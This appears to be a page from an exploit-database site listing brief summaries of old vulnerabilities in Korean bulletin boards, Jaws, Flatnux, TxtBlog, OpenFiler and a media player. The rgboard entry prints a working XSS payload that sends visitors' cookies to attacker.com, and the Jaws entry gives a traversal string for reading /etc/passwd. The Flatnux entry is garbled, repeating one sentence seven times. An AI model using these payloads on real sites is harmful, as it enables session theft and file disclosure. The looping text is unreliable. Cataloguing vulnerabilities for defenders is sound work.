header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

GRBoard 1.8 Remote File Inclusion Vulnerability

GRBoard (VERSION 1.8 )is bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. But I find Remote File Inclusion vulnerability. The vulnerability exists in the form_mail.php file, which includes the db_info.php file. An attacker can exploit this vulnerability by sending a specially crafted request containing an arbitrary file path in the theme parameter.

rgboard v4 5p1 (07.07.27) Multiple Vulnerability

rgboard (VERSION v4 (07.07.27)) is widely used bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. But I find a XSS vuln, LFI vuln and RFI vuln. Inject XSS tag: <img src = "http://attacker.com" onError="window.location='http://attacker.com/c.php?c='+document.cookie+'&l='+window.location">Hi there! :) /rghunter.php - Makes password as 12345

Jaws 0.8.8 Local File Inclusion

Jaws 0.8.8 is vulnerable to Local File Inclusion (LFI) when an attacker sends a specially crafted HTTP POST request to the vulnerable application. The vulnerable parameters are ‘language’ in the ‘/upgrade/index.php’ and ‘/install/index.php’ scripts. An attacker can exploit this vulnerability by sending a malicious HTTP POST request with the ‘language’ parameter set to a file path such as ‘../../../../../../../../../../../../etc/passwd%00’. This will cause the application to include the contents of the ‘/etc/passwd’ file in the response. Additionally, the ‘Introduction_complete’ and ‘use_log’ scripts are also vulnerable to this attack.

Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit

Euphonics Audio Player v1.0 is vulnerable to a universal local buffer overflow exploit. The exploit is triggered when a specially crafted .pls file is opened. The exploit uses a jmp esp from AdjMmsEng.dll as the return address and a win32_exec payload to execute a calculator program. The exploit was first discovered by h4ck3r#47 and later modified by Houssamix to make it universal.

Exploit code (PoC) for OpenFiler 2.3 (current)

This exploit code allows a non-root user to bypass authentication and gain access to the OpenFiler 2.3 system. The code takes the host URL, a username and password as input and then uses a fake password to bypass authentication. If the exploit is successful, the user can login with the provided username and password.

Flatnux-2009-01-27 RFI

Flatnux is vulnerable to Remote File Inclusion (RFI) due to the lack of input validation in the include/theme.php and flatnux.php files. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains the malicious code which will be executed on the vulnerable application. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL.

TxtBlog Remote Command Execution Exploit

This exploit allows an attacker to execute arbitrary commands on the vulnerable TxtBlog v 1.0 Alpha application. The exploit works by creating a malicious .php file in the application's directory, which can then be used to execute arbitrary commands. The exploit requires that the Magic Quotes setting is disabled.

Recent Exploits: